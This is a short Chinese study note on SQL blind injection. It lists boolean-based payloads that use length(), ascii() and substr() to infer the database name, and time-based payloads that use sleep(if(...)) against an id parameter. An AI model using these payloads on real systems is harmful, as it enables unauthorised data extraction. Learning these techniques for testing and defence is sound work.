sql盲注

时间:2021-11-09 23:53:58

1、sql盲注漏洞:

1、通过真假来判断。调整and后面的数据真假来对比

2、length(str)获取字符串长度   id=1‘ and  length(database())=8--

3、猜解字符串 ascii(‘test‘)        id=1‘ and ascii(substr(database(),1,1))>64    破解字符串

2、延时注入:

1、if (length(database())>4,5,0)

2、sleep(if (length(database())>4,5,0))

eg:id=1‘ and  sleep(if(length(database())>10,5,0))

3、id=1‘ and if(ascii(substr(database(),1,1))>114, 0, sleep(5))